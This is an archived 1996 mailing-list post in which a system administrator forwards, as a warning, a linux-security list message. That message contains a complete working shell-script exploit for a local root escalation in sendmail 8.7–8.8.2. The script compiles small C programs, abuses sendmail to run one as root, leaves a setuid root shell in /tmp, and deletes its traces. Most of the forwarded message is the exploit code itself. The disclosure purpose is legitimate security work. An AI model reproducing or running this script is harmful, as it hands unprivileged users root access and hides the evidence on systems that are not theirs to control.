[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

New vulnerability in Sendmail


I received this from the Linux Security mailing list today.  I checked the 
CERT archives and apparantly this problem is not yet documented.  It looks 
like it has a potential to be very serious.

I tested it out on my Debian system (sendmail 8.7.6) and it worked -- that is, 
it gave a normal user a root shell.  Yikes!

I have not yet seen any posted remedy for this situation, but I will be 
certain to watch for one.

(CCs to Tom, Jeff, and Karl...I thought you might be interested to see this, 
as it might effect your systems.)

------- Forwarded Message

Return-Path: linux-security-request@redhat.com 
Return-Path: linux-security-request@redhat.com
Received: (from uucp@localhost) by complete.org (8.7.6/8.7.3) with UUCP id 
SAA27814 for jgoerzen@complete.org; Sun, 17 Nov 1996 18:06:59 -0600
Received: from relay2.redhat.com (relay2.redhat.com []) by 
onyx.southwind.net (8.8.2/8.7.3) with SMTP id RAA27451 for 
<jgoerzen@complete.org>; Sun, 17 Nov 1996 17:39:32 -0600 (CST)
Received: (qmail 9371 invoked from network); 17 Nov 1996 23:29:37 -0000
Received: from redhat.com (list@
  by relay2.redhat.com with SMTP; 17 Nov 1996 23:29:35 -0000
Received: (from list@localhost) by redhat.com (8.7.4/8.7.3) id SAA24956; Sun, 
17 Nov 1996 18:29:15 -0500
Resent-Date: Sun, 17 Nov 1996 18:28:02 -0500
Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
To: linux-security@redhat.com
Message-id: <Pine.LNX.3.95.961117023402.9268A-100000@linnea.asogy.stockholm.se>
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
Content-transfer-encoding: 7BIT
Old-X-Envelope-From: sdx@linnea.asogy.stockholm.se  Sat Nov 16 20:31:43 1996
Old-Status: O
Resent-Message-ID: <"5yBDt1.0.F46.1-vZo"@redhat.com>
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com
X-Mailing-List: <linux-security@redhat.com> archive/latest/17
X-Loop: linux-security@redhat.com
Precedence: list
Resent-Sender: linux-security-request@redhat.com
Subject: [linux-security] Sendmail 8.8.2 exploit.

Hm, look what I got hold of today.. Works if sendmail is mode 4111 or

#! /bin/sh
#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" 
"\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd

------- End of Forwarded Message

John Goerzen          | System administrator & owner, The Communications
Custom programming    | Centre and Complete Network (complete.org)
jgoerzen@complete.org | Free Unix shell access, 316-367-8490 w/ your modem.

This message was distributed manually by Bruce@debian.org after the list
initially failed to distribute it.

Reply to: